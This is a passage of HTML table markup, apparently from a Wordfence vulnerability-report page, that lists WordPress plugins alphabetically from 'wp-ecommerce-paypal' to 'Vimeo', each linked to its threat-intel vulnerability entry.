			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-ecommerce-paypal" target="_blank" rel="noopener">wp-ecommerce-paypal</a>
		</td>
</tr>
<tr>
<td>Easy Property Listings</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-property-listings" target="_blank" rel="noopener">easy-property-listings</a>
		</td>
</tr>
<tr>
<td>Eazy Plugin Manager – Powerful Plugin Management Solution for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/plugins-on-steroids" target="_blank" rel="noopener">plugins-on-steroids</a>
		</td>
</tr>
<tr>
<td>Element Pack Addons for Elementor – Elementor Widgets, Elementor Templates, Elementor Addons</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bdthemes-element-pack-lite" target="_blank" rel="noopener">bdthemes-element-pack-lite</a>
		</td>
</tr>
<tr>
<td>Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-addons-for-elementor-lite" target="_blank" rel="noopener">essential-addons-for-elementor-lite</a>
		</td>
</tr>
<tr>
<td>Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">mage-eventpress</a>
		</td>
</tr>
<tr>
<td>Event Tickets and Registration</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/event-tickets" target="_blank" rel="noopener">event-tickets</a>
		</td>
</tr>
<tr>
<td>Exclusive Addons for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/exclusive-addons-for-elementor" target="_blank" rel="noopener">exclusive-addons-for-elementor</a>
		</td>
</tr>
<tr>
<td>Export User Data</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/export-user-data" target="_blank" rel="noopener">export-user-data</a>
		</td>
</tr>
<tr>
<td>Extra Checkout Options &#8211; addon for Extra Product Options plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-tm-extra-checkout-options-addon" target="_blank" rel="noopener">woocommerce-tm-extra-checkout-options-addon</a>
		</td>
</tr>
<tr>
<td>Facturación Electrónica Costa Rica</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/factura-electronica-cr" target="_blank" rel="noopener">factura-electronica-cr</a>
		</td>
</tr>
<tr>
<td>Five Star Restaurant Reservations – WordPress Booking Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restaurant-reservations" target="_blank" rel="noopener">restaurant-reservations</a>
		</td>
</tr>
<tr>
<td>FleekDash V2</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fleekdash" target="_blank" rel="noopener">fleekdash</a>
		</td>
</tr>
<tr>
<td>Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentform" target="_blank" rel="noopener">fluentform</a>
		</td>
</tr>
<tr>
<td>Fluent Support – Helpdesk &amp; Customer Support Ticket System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-support" target="_blank" rel="noopener">fluent-support</a>
		</td>
</tr>
<tr>
<td>FluentBoards – Project Management, Task Management, Goal Tracking, Kanban Board, and, Team Collaboration</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-boards" target="_blank" rel="noopener">fluent-boards</a>
		</td>
</tr>
<tr>
<td>FormCraft</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formcraft" target="_blank" rel="noopener">formcraft</a>
		</td>
</tr>
<tr>
<td>FormGent – Next-Gen AI Form Builder for WordPress with Multi-Step, Quizzes, Payments &amp; More</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formgent" target="_blank" rel="noopener">formgent</a>
		</td>
</tr>
<tr>
<td>Formidable Forms Signature Online Contract Automation</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forms-signature-formidable-online-contract-automation" target="_blank" rel="noopener">forms-signature-formidable-online-contract-automation</a>
		</td>
</tr>
<tr>
<td>Frontend File Manager Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nmedia-user-file-uploader" target="_blank" rel="noopener">nmedia-user-file-uploader</a>
		</td>
</tr>
<tr>
<td>FundEngine – Donation and Crowdfunding Platform</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fundraising-donation" target="_blank" rel="noopener">wp-fundraising-donation</a>
		</td>
</tr>
<tr>
<td>FuseWP – WordPress User Sync to Email List &amp; Marketing Automation (Mailchimp, Constant Contact, ActiveCampaign etc.)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusewp" target="_blank" rel="noopener">fusewp</a>
		</td>
</tr>
<tr>
<td>Gallery PhotoBlocks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photoblocks-grid-gallery" target="_blank" rel="noopener">photoblocks-grid-gallery</a>
		</td>
</tr>
<tr>
<td>GamiPress – Gamification plugin to reward points, achievements, badges &amp; ranks in WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gamipress" target="_blank" rel="noopener">gamipress</a>
		</td>
</tr>
<tr>
<td>GenerateBlocks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/generateblocks" target="_blank" rel="noopener">generateblocks</a>
		</td>
</tr>
<tr>
<td>GEO Plugin by Squirrly SEO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/squirrly-seo" target="_blank" rel="noopener">squirrly-seo</a>
		</td>
</tr>
<tr>
<td>GetGenie – AI SEO Assistant &amp; Content Writer with Keyword Research, AEO &amp; GEO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/getgenie" target="_blank" rel="noopener">getgenie</a>
		</td>
</tr>
<tr>
<td>GiveWP – Donation Plugin and Fundraising Platform</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">give</a>
		</td>
</tr>
<tr>
<td>GSheetConnector – CF7 Google Sheets Connector &amp; Save CF7 Entries to Database</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cf7-google-sheets-connector" target="_blank" rel="noopener">cf7-google-sheets-connector</a>
		</td>
</tr>
<tr>
<td>GTM4WP – A Google Tag Manager (GTM) plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/duracelltomi-google-tag-manager" target="_blank" rel="noopener">duracelltomi-google-tag-manager</a>
		</td>
</tr>
<tr>
<td>Gutena Forms – Contact Form, Survey Form, Feedback Form, Booking Form, and Custom Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutena-forms" target="_blank" rel="noopener">gutena-forms</a>
		</td>
</tr>
<tr>
<td>HBook &#8211; Hotel booking system &#8211; WordPress Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hbook-2" target="_blank" rel="noopener">hbook</a>
		</td>
</tr>
<tr>
<td>Icegram Engage – Popups, Optins, CTAs &amp; Lead Generation</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/icegram" target="_blank" rel="noopener">icegram</a>
		</td>
</tr>
<tr>
<td>Icegram Mailer – Reliable Email Deliverability, No-code SMTP Replacement &amp; Email logs</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/icegram-mailer" target="_blank" rel="noopener">icegram-mailer</a>
		</td>
</tr>
<tr>
<td>Improved Save Button</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/improved-save-button" target="_blank" rel="noopener">improved-save-button</a>
		</td>
</tr>
<tr>
<td>Insert Headers and Footers Code – HT Script</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/insert-headers-and-footers-script" target="_blank" rel="noopener">insert-headers-and-footers-script</a>
		</td>
</tr>
<tr>
<td>Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets &amp; Templates for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit" target="_blank" rel="noopener">jeg-elementor-kit</a>
		</td>
</tr>
<tr>
<td>JetBlocks for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-blocks" target="_blank" rel="noopener">jet-blocks</a>
		</td>
</tr>
<tr>
<td>JetEngine</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-engine" target="_blank" rel="noopener">jet-engine</a>
		</td>
</tr>
<tr>
<td>JetReviews</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-reviews" target="_blank" rel="noopener">jet-reviews</a>
		</td>
</tr>
<tr>
<td>JetSearch</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-search" target="_blank" rel="noopener">jet-search</a>
		</td>
</tr>
<tr>
<td>Kadence Blocks — Page Builder Toolkit for Gutenberg Editor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks" target="_blank" rel="noopener">kadence-blocks</a>
		</td>
</tr>
<tr>
<td>Kali Forms — Contact Form &amp; Drag-and-Drop Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms" target="_blank" rel="noopener">kali-forms</a>
		</td>
</tr>
<tr>
<td>Kirki – Freeform Page Builder, Website Builder &amp; Customizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">kirki</a>
		</td>
</tr>
<tr>
<td>Klubraum Membership Request</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/klubraum-membership-request" target="_blank" rel="noopener">klubraum-membership-request</a>
		</td>
</tr>
<tr>
<td>LifterLMS – WP LMS for eLearning, Online Courses, &amp; Quizzes</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lifterlms" target="_blank" rel="noopener">lifterlms</a>
		</td>
</tr>
<tr>
<td>Link Library</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/link-library" target="_blank" rel="noopener">link-library</a>
		</td>
</tr>
<tr>
<td>Location Weather – WordPress Weather Forecast, Air Quality &amp; Weather Widget</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/location-weather" target="_blank" rel="noopener">location-weather</a>
		</td>
</tr>
<tr>
<td>LWS Optimize – All-in-One Speed Booster &amp; Cache Tools</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lws-optimize" target="_blank" rel="noopener">lws-optimize</a>
		</td>
</tr>
<tr>
<td>MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailchimp-subscribe-sm" target="_blank" rel="noopener">mailchimp-subscribe-sm</a>
		</td>
</tr>
<tr>
<td>MailerPress – Email Marketing, Newsletter, Email Automation &amp; WooCommerce Emails</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailerpress" target="_blank" rel="noopener">mailerpress</a>
		</td>
</tr>
<tr>
<td>MailOptin – Popup, Optin Forms &amp; Email Newsletters for Mailchimp, HubSpot, AWeber Etc.</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailoptin" target="_blank" rel="noopener">mailoptin</a>
		</td>
</tr>
<tr>
<td>Mapster WP Maps</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapster-wp-maps" target="_blank" rel="noopener">mapster-wp-maps</a>
		</td>
</tr>
<tr>
<td>MasterStudy LMS WordPress Plugin – for Online Courses and Education</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">masterstudy-lms-learning-management-system</a>
		</td>
</tr>
<tr>
<td>Media Cleaner: Clean your WordPress!</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-cleaner" target="_blank" rel="noopener">media-cleaner</a>
		</td>
</tr>
<tr>
<td>Message Filter for Contact Form 7</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cf7-message-filter" target="_blank" rel="noopener">cf7-message-filter</a>
		</td>
</tr>
<tr>
<td>Meta Box</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/meta-box" target="_blank" rel="noopener">meta-box</a>
		</td>
</tr>
<tr>
<td>Meta Box AIO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/meta-box-aio" target="_blank" rel="noopener">meta-box-aio</a>
		</td>
</tr>
<tr>
<td>Meta for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/facebook-for-woocommerce" target="_blank" rel="noopener">facebook-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Meta pixel for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/official-facebook-pixel" target="_blank" rel="noopener">official-facebook-pixel</a>
		</td>
</tr>
<tr>
<td>miniOrange OTP Login, Verification and SMS Notifications</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-otp-verification" target="_blank" rel="noopener">miniorange-otp-verification</a>
		</td>
</tr>
<tr>
<td>Narrative Publisher</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/narrative-so" target="_blank" rel="noopener">narrative-so</a>
		</td>
</tr>
<tr>
<td>Newsletters</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite" target="_blank" rel="noopener">newsletters-lite</a>
		</td>
</tr>
<tr>
<td>NEX-Forms – Ultimate Forms Plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nex-forms-express-wp-form-builder" target="_blank" rel="noopener">nex-forms-express-wp-form-builder</a>
		</td>
</tr>
<tr>
<td>Online Scheduling and Appointment Booking System – Bookly</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool" target="_blank" rel="noopener">bookly-responsive-appointment-booking-tool</a>
		</td>
</tr>
<tr>
<td>Open User Map – Interactive Leaflet Maps</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/open-user-map" target="_blank" rel="noopener">open-user-map</a>
		</td>
</tr>
<tr>
<td>Paid Memberships Pro – Content Restriction, User Registration, &amp; Paid Subscriptions</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/paid-memberships-pro" target="_blank" rel="noopener">paid-memberships-pro</a>
		</td>
</tr>
<tr>
<td>Payment forms, Buy now buttons, and Invoicing System | GetPaid</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/invoicing" target="_blank" rel="noopener">invoicing</a>
		</td>
</tr>
<tr>
<td>PDFDraft – Drag &amp; Drop PDF Builder, PDF Viewer, Embed &amp; Download PDF, Certificate &amp; Invoice Designer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pdfdraft" target="_blank" rel="noopener">pdfdraft</a>
		</td>
</tr>
<tr>
<td>Photonic Gallery &amp; Lightbox for Flickr, SmugMug &amp; Others</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photonic" target="_blank" rel="noopener">photonic</a>
		</td>
</tr>
<tr>
<td>PickPlugins Question Answer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/question-answer" target="_blank" rel="noopener">question-answer</a>
		</td>
</tr>
<tr>
<td>Pinpoint Booking System – Version 2</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-system" target="_blank" rel="noopener">booking-system</a>
		</td>
</tr>
<tr>
<td>Pixelavo – Server Side Tracking &amp; Pixel + AI Ads Tools</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixelavo" target="_blank" rel="noopener">pixelavo</a>
		</td>
</tr>
<tr>
<td>PixelYourSite Pro – Your smart PIXEL (TAG) Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixelyoursite-pro" target="_blank" rel="noopener">pixelyoursite-pro</a>
		</td>
</tr>
<tr>
<td>PixelYourSite – Your smart PIXEL (TAG) &amp; API Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixelyoursite" target="_blank" rel="noopener">pixelyoursite</a>
		</td>
</tr>
<tr>
<td>Plugin Organizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/plugin-organizer" target="_blank" rel="noopener">plugin-organizer</a>
		</td>
</tr>
<tr>
<td>Podlove Podcast Publisher</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/podlove-podcasting-plugin-for-wordpress" target="_blank" rel="noopener">podlove-podcasting-plugin-for-wordpress</a>
		</td>
</tr>
<tr>
<td>Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mycred" target="_blank" rel="noopener">mycred</a>
		</td>
</tr>
<tr>
<td>Powerkit – Supercharge your WordPress Site</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/powerkit" target="_blank" rel="noopener">powerkit</a>
		</td>
</tr>
<tr>
<td>Premium Packages – Sell Digital Products Securely</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">wpdm-premium-packages</a>
		</td>
</tr>
<tr>
<td>Product Attachment for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-product-attachment" target="_blank" rel="noopener">woo-product-attachment</a>
		</td>
</tr>
<tr>
<td>ProfileGrid – User Profiles, Groups and Communities</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profilegrid-user-profiles-groups-and-communities" target="_blank" rel="noopener">profilegrid-user-profiles-groups-and-communities</a>
		</td>
</tr>
<tr>
<td>Pronamic Pay</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pronamic-ideal" target="_blank" rel="noopener">pronamic-ideal</a>
		</td>
</tr>
<tr>
<td>Qode Tours</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/qode-tours" target="_blank" rel="noopener">qode-tours</a>
		</td>
</tr>
<tr>
<td>Rank Math SEO – AI SEO Tools to Dominate SEO Rankings</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seo-by-rank-math" target="_blank" rel="noopener">seo-by-rank-math</a>
		</td>
</tr>
<tr>
<td>RealHomes Memberships</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/inspiry-memberships" target="_blank" rel="noopener">inspiry-memberships</a>
		</td>
</tr>
<tr>
<td>Realtyna Organic IDX plugin + WPL Real Estate</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real-estate-listing-realtyna-wpl" target="_blank" rel="noopener">real-estate-listing-realtyna-wpl</a>
		</td>
</tr>
<tr>
<td>RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-registration-form-builder-with-submission-manager" target="_blank" rel="noopener">custom-registration-form-builder-with-submission-manager</a>
		</td>
</tr>
<tr>
<td>Responsive Thumbnail Slider</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-responsive-thumbnail-slider" target="_blank" rel="noopener">wp-responsive-thumbnail-slider</a>
		</td>
</tr>
<tr>
<td>RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News &amp; YouTube Video Feeds Aggregator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/feedzy-rss-feeds" target="_blank" rel="noopener">feedzy-rss-feeds</a>
		</td>
</tr>
<tr>
<td>RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rt-mega-menu" target="_blank" rel="noopener">rt-mega-menu</a>
		</td>
</tr>
<tr>
<td>Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing &amp; Integrated AI Optimization</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metasync" target="_blank" rel="noopener">metasync</a>
		</td>
</tr>
<tr>
<td>SendPulse Email Marketing Newsletter</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sendpulse-email-marketing-newsletter" target="_blank" rel="noopener">sendpulse-email-marketing-newsletter</a>
		</td>
</tr>
<tr>
<td>ShopLentor Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons-pro" target="_blank" rel="noopener">woolentor-addons-pro</a>
		</td>
</tr>
<tr>
<td>ShopLentor – All-in-One WooCommerce Growth &amp; Store Enhancement Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons" target="_blank" rel="noopener">woolentor-addons</a>
		</td>
</tr>
<tr>
<td>Shortcodify</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shortcodify" target="_blank" rel="noopener">shortcodify</a>
		</td>
</tr>
<tr>
<td>Simple Link Directory Pro &#8211; AI Powered</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-link-directory-pro" target="_blank" rel="noopener">simple-link-directory-pro</a>
		</td>
</tr>
<tr>
<td>Simply Schedule Appointments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simply-schedule-appointments" target="_blank" rel="noopener">simply-schedule-appointments</a>
		</td>
</tr>
<tr>
<td>Single Sign On For TNG</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/single-sign-on-for-tng" target="_blank" rel="noopener">single-sign-on-for-tng</a>
		</td>
</tr>
<tr>
<td>SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">sms-alert</a>
		</td>
</tr>
<tr>
<td>Social Share, Social Login and Social Comments Plugin – Super Socializer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/super-socializer" target="_blank" rel="noopener">super-socializer</a>
		</td>
</tr>
<tr>
<td>Spam protection, Honeypot, Anti-Spam by CleanTalk</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect" target="_blank" rel="noopener">cleantalk-spam-protect</a>
		</td>
</tr>
<tr>
<td>SpeedyCache – Cache, Optimization, Performance</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/speedycache" target="_blank" rel="noopener">speedycache</a>
		</td>
</tr>
<tr>
<td>Spider Analyser – WordPress搜索引擎蜘蛛分析插件</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/spider-analyser" target="_blank" rel="noopener">spider-analyser</a>
		</td>
</tr>
<tr>
<td>Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/excel-like-price-change-for-woocommerce-and-wp-e-commerce-light" target="_blank" rel="noopener">excel-like-price-change-for-woocommerce-and-wp-e-commerce-light</a>
		</td>
</tr>
<tr>
<td>Staff Training</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/staff-training" target="_blank" rel="noopener">staff-training</a>
		</td>
</tr>
<tr>
<td>StoreGrowth – Upsell, BOGO, Quick View, Direct Checkout &amp; Side Cart for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/storegrowth-sales-booster" target="_blank" rel="noopener">storegrowth-sales-booster</a>
		</td>
</tr>
<tr>
<td>Subscriptions for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/subscriptions-for-woocommerce" target="_blank" rel="noopener">subscriptions-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>SureForms – Contact Form Builder, AI Forms, Payment Form, Survey &amp; Quiz</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sureforms" target="_blank" rel="noopener">sureforms</a>
		</td>
</tr>
<tr>
<td>Survey Form Block – collect answers and insights from your audience</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/survey-form-block" target="_blank" rel="noopener">survey-form-block</a>
		</td>
</tr>
<tr>
<td>Sync Post With Other Site</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sync-post-with-other-site" target="_blank" rel="noopener">sync-post-with-other-site</a>
		</td>
</tr>
<tr>
<td>Taskbuilder – Project Management &amp; Task Management Tool With Kanban Board</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/taskbuilder" target="_blank" rel="noopener">taskbuilder</a>
		</td>
</tr>
<tr>
<td>Theme Editor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/theme-editor" target="_blank" rel="noopener">theme-editor</a>
		</td>
</tr>
<tr>
<td>Thrive Leads</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/thrive-leads" target="_blank" rel="noopener">thrive-leads</a>
		</td>
</tr>
<tr>
<td>TrueBooker – Appointment Booking and Scheduler System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">truebooker-appointment-booking</a>
		</td>
</tr>
<tr>
<td>Tutor LMS – eLearning and online course solution</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">tutor</a>
		</td>
</tr>
<tr>
<td>Ultimate Addons for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-elementor" target="_blank" rel="noopener">ultimate-elementor</a>
		</td>
</tr>
<tr>
<td>Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-store-kit" target="_blank" rel="noopener">ultimate-store-kit</a>
		</td>
</tr>
<tr>
<td>Ultra Addons for Contact Form 7</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-addons-for-contact-form-7" target="_blank" rel="noopener">ultimate-addons-for-contact-form-7</a>
		</td>
</tr>
<tr>
<td>Uncanny Automator – Easy Automation, Integration, Webhooks &amp; Workflow Builder Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/uncanny-automator" target="_blank" rel="noopener">uncanny-automator</a>
		</td>
</tr>
<tr>
<td>User Access Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-access-manager" target="_blank" rel="noopener">user-access-manager</a>
		</td>
</tr>
<tr>
<td>User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profile-builder" target="_blank" rel="noopener">profile-builder</a>
		</td>
</tr>
<tr>
<td>User Profile Picture</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metronet-profile-picture" target="_blank" rel="noopener">metronet-profile-picture</a>
		</td>
</tr>
<tr>
<td>Vimeo</td>
<td>
